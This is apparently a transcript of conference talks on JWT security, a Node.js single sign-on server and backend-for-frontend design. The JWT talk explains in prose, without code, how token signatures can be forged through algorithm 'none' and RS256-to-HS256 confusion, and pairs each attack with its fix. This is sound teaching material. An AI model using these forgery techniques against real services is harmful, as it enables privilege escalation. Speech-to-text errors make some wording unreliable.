pass a white list of algorithms, right? So sometimes this is again something I've seen. This is like a lazy approach where you say, I need to give a white list, but I'm just going to read it from the header, right? Because that's the intended header, right? Again, if the algorithm, if the hacker intercepts it and changes to algorithm none, you kind of just shot yourself in the foot. So always have a hard coded list of white list algorithms and only these are valid. So signature stripping attack doesn't work anymore because algorithm none is will get rejected. Or two of this attack is this is super interesting, which is you can use the RS 256 key as the HS 256 secret. All right. This is similar to the algorithm none attack where the goal is to fool the verification and check this out. So this token was created with RS 256, right? Which means you had the private key on the authentication server to create the, to create the token, right? Public key is used for verification. Now public key has the name reply implies it's public. So the attacker can get his or her hands on it, but it's okay because all they can do is verify. They can't really change anything using the public unless. So this is what the verification looks like on the server, right? You say this is the token. This is the public key, right? Very fun. Can anyone tell me what's the bug in this right now? No, this is the verification. So on the authentication server, the one that generates the token, you need the private key, but on the verification side on your API server, you just need the public, right? There's a very simple bug here first, which is cool. Yeah. Somebody said I was missing. Yeah. So I was, I was testing you. Yeah. So I just told this, you always mentioned algorithm whitelist. So we're going to say these are the two algorithms that this API that this API supports, right? There's still a problem here, which is, um, notice how the signature kind of looks a lot like what HS 256 verification does. So it's like in HS 256, you'll do JWT verified token shared secret and the list of algorithms here. What you're doing is you're saying token the public key and the algorithm, right? Which means there's something weird in this map, right? So what an attacker can do is. Change the change the algorithm from RS 256 to HS 256. Of course do a privilege escalation by changing admin to true and then create a new token on the fly. Right? So you create a new token, say I'm doing HS 256 with shared secret and give the public RSE key as the secret. Right? So suddenly this is like a valid signature because it uses a secret. It uses HS 256 and on the server side when you're doing the verification, you're just doing the same thing. You're saying use the token. Use the public RSE key and these are the whitelisted algorithms, right? You see what the problem is here? The attacker can basically change the algorithm and because the function signature looks the same can fool your verification into thinking this is not an RSA 256 signature. This is actually an HS 256 signature and because it's in the whitelist, it's going to say, okay, cool. I thought you're going to give me RSA, but I also support HS or cool. I'm going to take it and it's going to verify the truth. Right? The fix there is if you can just use one algorithm authentication method across all your applications, right? Pick HS 256 or RS 256 and stick to them throughout. So that you don't end up doing the somebody cannot do like a substitution on you. If you can't, there are cases when you have like a generic server which has to support all of these split them into two, right? Create two different functions to create to check for different methods, create a decode RSA token, create a decode HMAC token RSA for RS 256, HMAC for HS 256 and based on what's in the header, send them to different functions, right? And then only put the whitelist in individual in one of them, right? So the RSA token only has RS 256 and then when you send it, it's going to fail because it's actually going to check the RSA thing for the RSA one. Even if you're trying to fool it with HMAC, it's it's the signature is not going to match. So split them if you have to use both other things that like you can also use the algorithm. Okay, that's that's good enough. Okay, cool. So that's I'm on 30 minutes exact. So that's all I have. These are the resources you can go to JWT IO for the dashboard to play around with it. There's a JWT handbook. It's like 120 page handbook which has everything you can learn about JWTs. That's where I learned almost everything for this talk. It's on this URL. Um, these are long URLs. I've just put them on my domain. It's at sit.studio slash JWT. You can get all the resources and yeah, if you like this, give me a follow on Twitter. Thank you. Um, do we take questions now or in the session? Okay. So how does this compare to a SAML tokens? No, SAML. I have no idea. Okay. Um, I have another question actually. Sure. So, uh, the tokens are actually created by the IDP, right? By the authorization server. Yeah. So the key which clients sends out to the authorization server, what actually, uh, is, is it made off? Yeah. Um, you're talking about the credentials part that. Let me go to the, just to make sure I understand. You're talking about this key, right? So this is like your credentials, right? This is your username password. Right. Well, sure. Yeah. So this is like a big way of saying that you need the credentials to get the authentication. The implementation details are very different. Usually what you do is if it's like a third party, then you redirect them to third party using a like a unique token so that it verifies the third party hits your own servers to verify. Is this really your application that's trying to do it? Right? There's like a handshake in between between the authorization server and your own services. And if the handshake is successful, then it passes a token that can be passed. Okay. So is it, is it, uh, basically, um, something like if it's a multi tenant, uh, system, so are you, are you sending the tenant ID there in the key or the tenant ID? Oh yeah. Totally. So, um, this is where the idea of if you have multiple services, then don't use the same signature. Uh, sorry. Don't use the same secret or same keys, right? Which also means that, which also means that if you have a multiple when you say servers that multiple services of your own and you're using a third party to authenticate, make sure you always pass the audience screen, right? So that for every audience or every API server that you have, it gives you a different token. Yeah. Hello. Uh, so, uh, if you're using a single sign on system like Google sign in Microsoft or let's say odd zero. So we would typically have a farm of thousands of servers and each would have an its own public and private key pair. So the intent and service, how does it know to use which servers public key in this case? Uh, you're saying the authorization server. How will that know which one to use? Uh, no, no, no, the, uh, the resource server basically. Oh, sorry. The API server got it. You're saying how will the API server know which key to use which public key to use for verification of the for sure. So, uh, the fun part is that this public private key is between the authorization server and the resource server. Right. So when you create a new, uh, public private pair, you basically put one private key in your authorization server and you keep the pair of that, the public pair of that in your API server. So if you have three API servers, you actually create three different pairs and send put the public keys in each one of them and then in the authorization server, say for this one, use this private for the second one, use this private for the third one, use this private typically in implementation, how this works is, um, if you're using a third party, then you say, I'm going to create three services on their dashboards, CLI, whatever they have. And they give you the option of downloading three different public keys, which you put in the specific API server that you want them to use. Right. So the API servers, if they're three API servers, which means they're three different resources, uh, each one of them has only one public key, not all of them. Okay. Okay. I understand what you're saying. So when I say authentication or sorry, authorization server, I don't mean authorization server instance, right? If there are five instance doesn't mean you need five different keys, right? Because if you're load balancing, then they're basically duplicates of each other with the same keys by authorization server. I mean, if this is like one, let's just call it authorization app, right? Authorization service. If it's a service, it has one. If you load balance, create replicas, all of them should have the same keys. Yeah. Yeah. Right. Maybe I should just call it service instead of server. Well, that's a fantastic talk. So, okay. So before we continue, we have like an announcement. Uh, uh, so every part of the conference, we do this thing called flash talks for all those of you who are new. Uh, so it's basically you have five minutes. You can come here, talk about anything you've done at work, personal project, anything that you'd like to share, uh, can be related to tech, not tech whatever, but, uh, the two of us are here. Uh, maybe you can meet us now, submit what you're going to talk about or, uh, you know, at lunch and we'll like hook you up on the schedule. One more announcement. Please turn off your mobiles. It is like very annoying to first speakers. So how many of you use social logins like login with Facebook, Google? We'll still use Facebook. Why after all this? Okay. Okay. Is there any nice method to authenticate? I don't know. Maybe like before 2019 May, we might have sign up with Adhar also coming up very soon. Adhar. Yeah. Hopefully you never know. Come on. We need to have good and nice authentication. So I think Arnab can speak more about how authentication can be done right. One more thing Arnab recently told us that the Hasgeek Android app, uh, is buggy because he's done something to it in the last fix. So he told us to just clear the air out. So I know the stage is yours. Authentication done right. So, uh, we're going to talk about, uh, uh, my journey of, uh, creating a federated login system or like we can call it single sign on server in a node. Just, uh, I have a disclaimer in the beginning. I am like, don't consider me a expert in node. Just a cybersecurity should do your due diligence when you're creating authentication system, figure out things on your own, uh, definitely. Uh, this is like, uh, I don't want it to appear like a best practices talk. Uh, I would like presented more like, uh, the things that we did, things, some of them that went wrong. What we did to fix that, uh, maybe when you're making a similar system, some of these things might be helpful for you. So start with, uh, what did we, uh, build? Like, uh, I mean, what kind of a system do you call SSO visits, federated, uh, anti-management system or LDAP? So here's what we needed actually, uh, something very simple. We wanted a single system, uh, in which users can log in using external service providers. If they want to, like, they can use a Twitter login or Facebook login or something like that. And, uh, we have like a lot of different client apps. So we have one, uh, e-learning app, watch videos. We have an app where people can participate in a lot of contests. So like a microservice kind of architecture. So there are a lot of different apps and people should be able to like log in with a single identity. So there are two parts to it. Uh, one part is, uh, and what, uh, client, which, uh, helps us, uh, get people logged in to our system for using some other third party server. So like the upper part of the system, they can log in using some other systems. And of course, uh, we do have support for, uh, local logins that is keeping in account with the username and password on the system, not use a third party login if they want to. Um, so things that we're using to build it. Um, so, uh, we're using, uh, PostgreSQL as a database for saving the passwords and, uh, one of the most beautiful things that we're using. Uh, so, uh, the last talk you heard was also from odd zero and they have a beautiful service which allows you to create, uh, like, uh, completely outsourced identity management system. Uh, what I really like is that everything that they have used to build their own system. A lot of those tools are open source. So you can literally create a copy of odd zero on your own, which like our system is much like that using their own tools. So passport, uh, common library for authentication using Node.js. It's made by the people who have built odd zero. Then there's the second part of the system, which is the, uh, what server which, uh, is a system, uh, which allows all of our client apps to, uh, be able to use a single login system. Basically the lower half of this. So there might be, uh, some systems that use authentication plus they also use, uh, user roles for doing some ACL. Um, there is, we have an app which, uh, basically needs the GitHub data of the user, uh, to give some scores and all. Then there could be, uh, some apps which, uh, do some two way data updates. Also the user's information can be changed from the client app on the SSO server, uh, other way around as well. And, uh, to do this, um, we, uh, are using a Node.js library called what to arise, uh, the first version was called what to rise, uh, and we just added two in the middle. We call it what to arise. It, uh, is a very, uh, simple way to create a what 2.0, uh, server. Uh, you don't need to implement a lot of things by hand, um, and we're using like stuff for sending emails for verification and stuff. And we have, uh, speak easy, uh, it's a library made by a lot of Googlers, which helps you use Google Authenticator or any time based OTP, uh, methods. So when you went out building it, uh, a few of the things that, uh, we had in mind right from the beginning, like basic tenets that will definitely follow these things, um, is, uh, these first, uh, no JavaScript. So speaking at a JavaScript conference, no JavaScript, I mean no JavaScript on the front end. So our system does not rely the login server only not, I'm not talking about the client apps. I like they are all, some of them are ember apps. Some of them are Vue.js apps. I'm talking about the authentication system itself does not rely on any front end JavaScript. So we just completely eliminated the case of XSS, no cross side scripting to be, uh, handled at all, um, I mean, uh, and also our cookies are then HTTP only cookies. Um, and, uh, I mean, for perspective, uh, there is, if you try out, you disable JavaScript in your browser, try out most of the Google services, try out Gmail, try out Google search, they work perfectly. So you can build pretty complex stuff without using JavaScript on the front end. And that's the way the web bus built at one point of time in the past. So, uh, and it helps in security for, uh, saving the passwords using B Cripp and, uh, I think this is something I have seen a lot of people, uh, and even we ourselves, we experimented with a few things here and there and it really boils down to you like just keep it simple. Uh, PBKDF or B Cripp, these two are some of the best methods. Um, we are, uh, using search, but we are not using pepper. I think for the kind of scale that we operate on the kind of, uh, uh, attacks that we can possibly face, I don't think peppers are not needed. Uh, I think it would be an overkill to do that. Um, then. So if you're creating a authentication system and you want like a lot of your products are using the same authentication system. Uh, and in today's day and age, uh, I think one thing you definitely should have is, uh, allow users to opt into 2FA unless you're a bank or something like that, you might want to enforce 2FA, but otherwise, even if you're making a simple product, you should at least let people opt into 2FA. You can maybe use, uh, some, uh, OTB generation methods via SMS and email or something like that. But, uh, or you can use, uh, Othi or, uh, Google Authenticator to use a POTB solution for that. Um, okay. So pretty contrasting after the last talk, but, uh, we use JWTs a lot. We use JWTs a lot across our client apps. So when like, say for example, we have a video player. The video gets signed by a JWT. We use that to download the chunks of that video. So we're doing that in a lot of our application, uh, servers. The authentication server does not use JWT because of two reasons. One of them I told already we are not using JavaScript on the front end. So I think one of the good ways of using JWT is keeping it in the RAM, not in the storage. So that won't be possible if we don't use JavaScript on the front end to we want server side logouts for the central authentication system. You want that? Like, uh, if you don't use, uh, like if you use JWTs, you end up turning them straight full. You keep a blacklist or you keep a white list. And if you end up with a blacklist or a white list, then you are at the end of the day storing in the database. So it's better just fall back to tokens itself. Okay. That's the reason, uh, not using jail booties. Also the entire knowledge that download happened here last half an hour. The developers don't need to understand that to implement the system because yes, jail booties easy to implement, but to correctly implement you have to keep in mind a lot of those things. Um, this, I think if you're creating a single sign on system, um, we, this is something that we follow is that, um, we have some mobile apps also and in the mobile apps when we log in, uh, the username password entering happens through a web view. We don't, uh, do like, uh, user get the username and password on the client and then pass it over the API. We don't do that. Uh, so that's like, I think I prefer doing it this way because when you're doing it via a web view, the users can see the URL. So, uh, phishing gets prevented. Man in the middle attacks that prevented the users can see if it is over HTTPS or not, uh, which on an app, it's, uh, hard to see. Uh, it's, uh, easy for somebody to maybe decompile your app, modify it and then phish some password or something out of it. Uh, and unless you are like somebody like Facebook or Google where people have a lot of trust on that app and they know for sure that they're using the correct app for something else, uh, prefer to just, uh, use a single UI for taking the password. There should be not two, three different places where the user is submitting his trust. So, um, few things, uh, I think building a security system, let's decide what we cannot protect. This is very important because, uh, they are attack vectors everywhere. Uh, and if you try to protect all of them, you're going to end up with a mess. This is my favorite ex-cd comics that all kinds of security measures one side and you can just beat a person and get his password. Okay. So, uh, that's the case. We are not covering. So very simple. If somebody shares this password tells his password to somebody else or somebody looks at somebody typing the password, we can't protect that and, um, basically, uh, we're going to protect our system. We're going to protect till the extent of our SSL certificate. If there is any client side proxies or anything, we don't want to cover that case. It just complicates the thinking process. Like then you start thinking, okay, we'll protect against this. I'll protect against that. No point doing that. Just do the ones that are possible. Yeah. Um, this is very important. So how many of you here have used now to enter an airport? So very identified or authenticated. So, um, identification is, um, just, you know, you tell your name is something that's identification. The getting this difference clear is very important when you're creating a authorization system, uh, authentication. Now that's when you actually verify whether, uh, the identity that has been provided is correct or not. And, uh, this authentication have happened in two ways. One is using implied trust. So if you say, for example, um, show your passport to somebody, um, and somebody sees the passport and sees that it looks authentic as in the paper and the quality of it that looks authentic. So they trust the government of India and they think that you are authentic because the passport does not look like it has been forged. Okay. The other way of authentication is what's called tofu trust on first use. That is you first time meet a person tell that, you know, there's a secret word that we share with each other in future. Whenever I share this secret word, you know that it's me. Okay. That's the password way of doing authentication. Okay. But either you need to trust a third party to identify the person or you need to trust that person first time by default and then, uh, next from next time use the first trust factor. Okay. So, uh, but it is more than just identification than this authorization. So you have access to something that allows somebody else to use it as simple as that. That's authorization. Yeah. There's a question here. Um, what's the official name of the HTTP error code? 401 unauthorized or what authorized 403. Okay. Uh, somebody who is logged in can they get a 401 error? And somebody who is logged out can they get a 403 error? Okay. Can the same route generate a 401 and a 403 in different use cases? Mushad answers. Correct. 401, the name is unauthorized, but it actually means unauthenticated. With the HTTP as per the HTTP spec, the name is authorized, but it does not mean unauthorized. It means unauthorized and forbidden is what actually means unauthorized. So only when you're not logged in, you can get unauthorized when you're logged in, but you don't have access to that particular route. You get a forbidden. Okay. This brings to authentication via authorization. So, uh, quick example, you want to prove that you own a house. You can show the, you know, sale deed or property certificate or something like that. The other way to prove it, you invite somebody home. They assume it's your house. Okay. So that's authentication authorization. You authorize somebody to use your house. It's implied that you own that house. Okay. So when we're doing what we're doing something very similar to this. Uh, let's just take a look. Um, steps go like this. You go to a browser. Um, browser sends a request to server. Server gives you a login page. Go to login page. Click login with GitHub. Okay. Browser sends a request to get up now and it adds some client ID redirect where I saw that GitHub knows which app is trying to log in. Okay. GitHub sends me back the blogging page. Get a blogging page. I add my username and password. Okay. Now this going to post request to get up. The challenge will get verified username and password correct or not. I'm not sharing my username or password with the coding blocks app sharing only with GitHub. Okay. And now there are two ways forward. Okay. Right. Blue pill. I've got implicit way and explicit way of authenticating from here forward. So let's look at what implicit way means. So get up redirects me back to my website and the URL contains the author. Okay. So at this point, I'm already trusting that my browser has opened my website correctly. It's implied trust there. And now if I want to get my profile details, my profile page can simply make our Ajax request to say API dot github.com slash profile pass this header or token equal to something I will get name email username and see this is where authentication authorization is happening. I get the name email and username from GitHub. So I authorized this app to get my profile information and the app takes this profile information and it just trust that this name and this email is correct. So I think this blue pill is red pill explicit author case get up takes me back to my website, but this time it gives a grant code instead of a auto token. Now for this to work, obviously you need your background server. This cannot work on only front-end base systems. You have to pass the grant code. You get all token pass the auto token, get your profile data, then you show your profile page. Okay, so this is the kind of system we are using. This did not have front-end JavaScript to work. You can do the actual transfer in the back end. If you laid out all the steps together, this is what the implicit steps look like. This is what the explicit steps look like. So when you do a flex plan page, then that information is actually exposed. Okay, so while you're building this things that we learned sometimes we burnt our fingers on certain things in the first thing and you have had two security talks and a lot of the things might have been like captain obvious and here is one of the captain obvious slides, but this is important. We ran the system for I think more than one year had about 10,000 users till that point. We did not have CSR protection. We were we did not have a content security policy and that's like the story of a lot of startups. Just start building things prototype prototype becomes production. You don't know when it becomes production. Okay, users start pouring in the friends and family are using tomorrow like people are using, but I mean as much as possible not do this. I mean, first time you do this. Maybe second time you make an app. Don't do this because one major problem we had is you were actually saving the sessions in memory. We had to when we had to scale up, we created cluster mode. I mean, it did not even hit me first. Some guys is I'm trying to log into your website. I logged in but when I refresh the page, sometimes the page opens sometimes it says I'm logged out like sometimes what do you mean by sometimes? Okay, and so what happened was that depending on the kind of name resolving strategy you're using engine x my request were all being served by one of the clusters not by the second one somebody else was using their IP was rotating and sometimes they're using node one, sometimes node two and their token is in the memory of node one, not in node two. Okay, you can't scale if you save stuff in memory. Of course, it took us three, four days to figure out. Okay, that's the problem here. So here's like after doing this, I think with the transport layer stuff. I think we figured out basic security versus overkill kind of checklist using X frame options probably using deny so that people cannot put your website inside an I frame that's a good option to do content security policy keeping one definitely very useful. I can recommend looking up github engineering blog. They have a very nice article on how to do content security policy. Okay, should ideally have a specific CDN which sends your images styles and fonts and you whitelist that in your content security policy is excesses via images are see one of the easiest way people do don't do that keep a white list for that and this is the place where you can actually with a hard switch you can disable JavaScript on the front end. You can use script src and pass an empty area to script src. In that case, no JavaScript will get executed on your site at all. Okay, some websites and production level like Facebook GitHub. What they do is they have a separate CDN from where the support send their JavaScript files. Okay, and the script src does not contain self, which means any lines of code part of the HTML does not get executed only the JavaScript that comes from the CDN gets executed. Okay, so like if there are some Chrome extensions or all or somebody man in the middle injecting JavaScript into your page that does not work out. Okay, um, CSR protection very easy to do these days in Node.js. You see surf replay the token. This is something basic hygiene should be done. Of course. Okay, this is very important. Um, I know a lot of people who think this way that if you're using, uh, very popular SQL library, you're using an ORM statements are always prepared. So you don't need to worry about SQL injection. It's a problem solved in the by gone era, but it's not, uh, so like just, uh, last year, uh, in sequelize the most popular ORM in Node.js, uh, two vulnerabilities on SQL injection was found out. It was patched. Current version does not have any, but you never know when a new feature gets added on SQL injection might get added to it. Okay, so, uh, for this, I think, uh, you can read up a nice article by a snick SN Viking. It's also a good tool to check out, uh, whether your code has vulnerabilities and all. So, um, I mean, uh, this is a strategy security experts say defense in depth, validate your variables at every layer, validate on the client. If you have client JavaScript, uh, if not, then m layer, v layer, c layer, every layer, validate the input. Okay. Don't just think that in one layer you're validated next year, it will come out to validate it automatically. Okay. Rock worries and all, uh, if you're doing that, of course, manually escape stuff. Um, this thing, uh, also we learned is that, uh, you know, we download a RFC paper and we see, okay, the spec is fine. You start implementing one thing to thing. Find one thing. Okay. Refresh tokens. Okay. There are when you have to make a post call then a get call and all of that. Okay. I will just make a separate endpoint which will refresh my tokens. Okay. So just maintaining everything 90% of the spec you're following, take one little shortcut. It bites you in the back later on and we have now, uh, figured this out. We never, uh, sidestep the specs ever doing things like this. Um, so I think, uh, the refresh token thing was something that we implemented our own way of doing refresh token server to server refresh token calls without using the user scope and, uh, that obviously first of all created a vulnerability. Second, uh, the thing is in security, I think, uh, once insecure, if you are having a mobile app or a PW or something like that where you cannot control the rate at which people are updating their clients, then once it is insecure, it's going to remain insecure for a long time because if you have an API which is insecure, now you update to a secure API, the clients stop working. You don't know business guys won't allow that to happen. They will say, okay, keep the old API open for two months, wait for the people to update till then, you know, there is a vulnerability and you're living with that vulnerability. You can't get out of that. Either you delete, uh, like, uh, 10,000 users were using that every day. They stopped using it. Something like that will happen. Okay. So turning things insecure and then turning it back to secure very hard. Uh, you go out of the spec, you sometimes, uh, risk certain things like that happening. Another one incidence is we initially thought that people will always log in using a user scope, but then some client might want to edit data, not using a user scope like as a client itself. The old spec supports this. We thought such a case will never happen. We had to rewrite a lot of our project to, uh, support such things. Um, for what I think some of the things that you can differ not ignore is, uh, say refresh tokens. You can make that people will just log in once again. If their tokens have expired, but don't consider like don't implement a different way to refresh token either. Don't implement it at all. That's fine. Similarly, scopes and all for, uh, clients, you can use a star scope for everything. And later on you can add scopes if you want to. Okay. And one thing I know what is something called a password grant type. Like I said with the single UI model, uh, don't support a scheme where the username and password can be sent over a post request and you can give a grant type that exists so that what's to is compliant with the one. It's a backwards compatibility thing, but it makes what's insecure. Better not to implement that. Um, this now coming more towards the business side aspects of creating a system like this and whether things that, uh, not work out well and we had to, uh, so state management is a very important part of UX and, uh, I'd like to show you, uh, a couple of things. So there is, uh, zero login system. So what does zero login mean? So I'm, uh, this is one of our client apps and I'm logged into that right now. If I go to another of my client apps, so I'm logged in, I mean, basically when I went to the online dot coding those.com, this site, I did not have to log in again. Um, other ways, um, if I am on one of the apps and in any other tab I have logged in, I can click on login and I get logged in automatically. So I mean saying say one click login and two click login path, which is like if I, uh, click on login and I'm not logged in right now, then I can either put my challenge or I can use one of the social providers and if I'm logged into the social provider, then two clicks takes me to login. Finally, if I'm not logged in anywhere, okay. So in that case, I have, of course, it would be a three click model, but then I have to log into Facebook also. Okay. And there's another case which I call as the broken flow model. Somebody comes to our website and they don't have account with our website now and they click on login takes me to the single sign on server. There they sign up with their account. Okay. The sign up, but uh, some of our products, they needed, they need a verified email ID to use it. Okay. They just, they don't work only with a simple sign up. You have to verify your email ID also to be able to use it. So at this point, their flow breaks because they now have to open their inbox, check the verify link, uh, open that verify link. Okay. So this is the place where a lot of systems I've used even popular ones like over and all I've seen. This is where flow breaks from a lot of times. You, uh, click on the verify link. You don't end up at the exact page where you started your entire cycle from. Okay. So you should ideally, uh, like make a redirect where I part of the, uh, verify link itself, or I think that's not an information you'd probably want to share over emails. That's fine. You attach the redirect part in database to your, uh, verify emailing so that if somebody like signs up, then they have to check their inbox. So at that point, a lot of drop happened. Sometimes people just leave using that and maybe next day they come and click on the verify emailing. Okay. So when the next, they click on the verify emailing. Okay. Capture the user back at the same point in your product where he left. So he was probably added something in his cart. We'll go and buy it. Okay. If he ends up at my profile page, we'll not provide it. Okay. This is very important. The broken flow model also should end up at the same place where he started from. And, uh, now about the part where when we have, uh, SSO server and a lot of client apps. So we need to separate our concerns also. Um, we need to make sure that, uh, first thing, uh, there's a data API. So the client apps use the user, uh, API to get the details of the user. So whenever data switching is happening, that should always happen over the version API so that if you change the API of the SSO, you don't need to rewrite the code in all your client apps. Okay. Um, if like different apps need different, uh, sets of data, you can create scopes for them. The authentication flow, like how we are logging in via Facebook or how we're logging in by Twitter, or how we are giving our challenge. That part of the flow is not related to the client apps that is purely in the SSO level. So that part, if we change, we don't need to version that that part we can change on our, uh, own, that's fine. But whenever the client apps are accessing data from the SSO, make it version. Um, this, um, I think we have done a lot of to and fro on this and we have ended up with a thumb rule on what kind of data should we save on the SSO server? What kind of data we should not save, uh, is, uh, if some data needs to be there on at least more than two of our client apps, then only we think of centralizing it and keep in mind that if it is not related to user data and this is like, uh, lazy developer thing. You think that, you know, uh, like some information, like information of all like the demographics, like country, state, information, et cetera. We need it in a lot of apps. Okay, let's just put it in the SSO server because everybody's using a server. It's just going to slow down your SSO server needlessly. Okay. If you need like global information across 10 of your clients, just create a separate microservice of that. Don't dump things into the social server just because it's globally used everywhere. Only as long as it pertains to the user data. If it is about the user data, then, uh, and this you should always maintain this thing is that if we need in our one of our client apps, we need information about the GitHub's GitHub user profile or like Facebook user profile. We need those queries should happen via the SSO server so that your trust in always remains on the SSO side. Okay. Like, uh, that way it can happen is like, uh, we can get a Facebook authentication token, pass it on to a client app. But then in the client tab, you will have to implement the Facebook refresh token mechanism also just end up rewriting that all the time. So if the user has done a third party authentication in the SSO server accessing data office, third party authentication should have happened through the same flow itself. Then this is challenging keeping data in sync across these things. Some of the data will obviously become redundant. Maybe name of the user profile photo. You might keep a copy in the client apps also in the SSO app. So, uh, when it is really important to keep the data in sync, then every authentication just refresh the data from the SSO server. Um, uh, otherwise, like if it's not all that critical, then you can maybe run some cons, et cetera for updating that data. And, uh, if you have like data updates on the SSO server, then, uh, do not, like create any generic, like special APIs. Just do it using the proper STP using the users of token scope. So every client app should be treated equally. Nobody should have like a special hook to like change an entire table on the database. That's where security flaws start happening. Um, we've also found out that, uh, whenever you want to implement things, uh, if you just take a little bit of time out to find out if some specifications exist for that, some standards exist, uh, that has had better results. One example thing specifically was, uh, all country, states, cities in the world, they have ISO 3611 code, which uniquely identifies, uh, every, uh, like region. Uh, if you use that, that you can use that as primary keys because the ISO standard ensures that it is unique. We have migrated that a lot of times. Finally, I ended up using the spec. Yep. Uh, so this, uh, analytics and monitoring, uh, I'll show you something. Anybody remembers getting emails from Twitter or GitHub? How your passwords are probably logged. A lot of people got these. Okay. And it was widely speculated though. None of them actually verified. They both use a similar logging Ruby based logging framework and it was speculated that they were actually, uh, using a log all framework, which was logging the entire request bodies and that's why your passwords are getting logged. Okay. So whenever you're using log all kind of frameworks, make sure you're sanitizing the, you know, the log values. Lot of libraries, they remove specific keys. Like if you have a key name password, they will probably delete that, but still you should manually do that. Uh, in addition to that, uh, if you have compliance and legal issues, keep in mind that when you're using third party monitoring services, then the user's data does not stay with you. It goes to somebody else. You need to, you know, maybe talk with your lawyer if you're a big company. Uh, we don't have a lawyer. We are a tiny company. Okay. Um, use like standard HTTP error codes also. They, like your analytics and monitoring software, they have some default behavior if you're using proper error codes. Um, this famous, uh, acronym article about this, or if you, uh, put your username and password on stripe or GitHub, they say that username or password is incorrect. They don't tell which one is incorrect, but then you can go to the sign up form and check if the username is correct or not. Okay. So, uh, not telling whether the username is correct or not can have a benefit only if there is no easy way to find out if the username is correct. Okay. Most of the web based applications, you try to sign up. People can get to know if the username was correct or not. Okay. So you're not reducing the attack vector just by not telling the user whether the username was correct or not. Rather, if you exactly tell if the username or the password was not correct, the user will rectify only that part. Okay. So you're just confusing the user. I mean, we did this. We ended up with the situation. People are not able to log in. Just why can't you log in? We call up the user. I can't log in. I just can't. He can't, he can't describe anything beyond that. Okay. So now we make it a point that I mean, as long as the user, the error can make sense to a layman, we pass that error on like the message is more specific. You don't like the server failed or something like that. Not that kind of errors. More specific. So it helps us debug production errors better. This thing, when we're doing a third party authentication with services like Google, Facebook and all after Cambridge Analytica, they have been cleaning house a lot. A lot of times this happens. An example from discuss like this is current example. If you try to log in with Google and discuss, it will not work because Google plus, they have disabled certain profiles. Gobs on that. If you just want to do login for that part, don't take an extra extra scope other than just the profiles. Okay. When you need extra information, do a loopback across that provider once again. Okay. That the user signup cycle does not break. Lot of times say if you want to do Google sign in with Google, it is very seamless. But if you ask extra permissions, then you get a page like this. Okay. And this page out of our data, I mean, we have like 20, 30,000 users don't have a lot of data, but we have seen a lot of dropout from this place. Like if you ask for extra profile scopes, people don't give these permissions. It's very common. If you just need to log in, just log in and most of these service providers, they don't ask anything extra during the login part later on. If you need other things, do it later. Common stuff, try to stay generic. So don't try to create like specific use cases kind of things. Then this is one thing we have been trying to figure in a lot of ways how to handle the duplication part de duplication. I think you need to segregate between two things in mind is somebody deliberately creating a new email account and trying to log in is different from somebody mistakenly having created two accounts, one with the Facebook login, one Twitter login. So when sometimes you need to allow people to merge their accounts and if you think that your business case depends on identifying a user so that he cannot use two accounts to use some coupons or some benefits. It's India. Forget that. Okay. That's not going to work out. People are going to create multiple accounts and they're going to use that business model depends on that. I don't think that's going to work out. And finally, secure even from yourself. This is very, very, very important is that when you're like having slowly your development team will grow start with one person. There's a founder, there's a CTO, then team grows this 10 people, 20 people right from day one. Make sure that you keep a copy of your database run across job that anonymizes all the data and then you check across the anonymized database. It's a good practice to have from day one. Later on, it will be hard to implement. Okay. Second point. I mean, I don't know how many people would agree, but our system is completely open source and that has helped made it secure a lot because every time we make a good comment and push, we know that the world is going to see this code. So we just make sure that, you know, there is no security flaw in that code is like double two times. We're thinking about that all of our products, which are closed source, there are only two, three of them. They are much more insecure than the open source one that I can say for sure. Okay. So summarize security is pretty simple. I think the, these two things are things you can keep in mind. A lot of people say that making things secure reduces the experience. I think it does not reduce the experience of the user, but it definitely does use the experience of the developer. Okay. You are going to like create a lot of your barriers for yourself when you make your system secure, but that's a cost on you, not the cost on your users. You can keep things with very nice UX plus security. That's easy to do. And yeah, like just follow the security tips that you have known from the beginning and I'll just end my presentation with a nice joke here. I don't know how many of you might have seen this in Twitter. This is one guy who complained to T mobile Austria that the call center person was verifying their password over call. So he said that means the call center person has access to my password, which means that is probably saved in plain text. Okay. Also not case sensitive. Wait, it's not. It's not end here. You will says the customer service isn't see the first four characters. Not the other ones. So we store the whole password because we needed to log in. Of course. So they go on saying that you have so many passwords for every app for every email account. So on we secure all data very carefully. So there is nothing to fear. Okay. And somebody comes up and says what if your infrastructure gets breached and everyone's password is published to plain text to the whole wide world. What if this does not happen because our security is amazingly good? Okay. It does not end here. The guy says he has a comeback. This is that nobody's security is that good. Not even yours. You know, while Australia has to always come come back to that saying that do you have any idea how telecommunication companies work? Do you know anything about our systems? Apparently that guy has to work at the telecom. So that guy has experience working with telecommunication systems. So don't act like T-Mobile Austria think security is something we should always just keep learning and advice wherever it comes from here at research on your own. I don't think anybody knows everything about security. We're all learning every day. So building the system. My inspirations were stack exchange network. It has a very nice dual layer SSO system and login with a lot of things into stack exchange. They have a lot of sites and has Geeks own last user system. So that's something I looked upon a lot, but I'm not so comfortable with Python. Otherwise I would have used that wrote my own one and two people I would like to thank Jared Hansen chief architect at odd zero. He without his libraries making a lot of these things would not have been possible. Aaron Hammer author of what one point oh and he has written a very big blog article criticizing or 2.0. I read that I figured out which parts of what 2.0 are useful and which parts are not. So thank you. You want to see the source code of this system when I'm describing it's at github.com slash coding block slash one or two. You want to see it in action. It's account dot coding dot com follow me on Twitter. That's a nice talk. I know that nice thick figures. So I think everyone might be exhausted because of all the security authentication from the morning. Right. So let's take a break. So just socialize yourself have some coffee and come by 1140 because we have a spoiler talk about BFFs. Hey, I think you had a good break. So our next speaker is I'm getting much a lot. He's a foodie like he tries to eat in so many restaurants like finding good food and stuff. If you have good food decisions, he can give you and his talk is about securing a BFF. I don't know what it is about. Let's hear it from Ankit Ankit. It's green. Hello. Yes. All right. So I hope I'm audible. Oh, this is too loud. Yep. So. Hey, everyone. I am Ankit Machala today. I'm going to talk about building a secure BFF which stands for unfortunately back in for front end and not best friend forever. So back in the day or even many companies now build services which are complete in itself. They are huge servers which handle everything. It might be authentication, user, team information and everything. So clients connect to these servers which have their own database and everything and then figure out everything. There's the server handles everything and gives them information of these are termed as monoliths and over time they turn out to be difficult to maintain and have a very comparatively slow release cycle and then people started moving on to breaking this entire monolith down into smaller services which are called microservices. Here each of these service that say authentication and user are broken down into separate servers which have a very well defined business domain saying you will function in this domain and only give me functions which help modify that data. And then clients will connect to all these microservices, fetch information and then show it to the client. But the problem here is that now instead of the client connecting to just one server it has to connect to 10 or 20 different servers based on the number of microservices you have and then 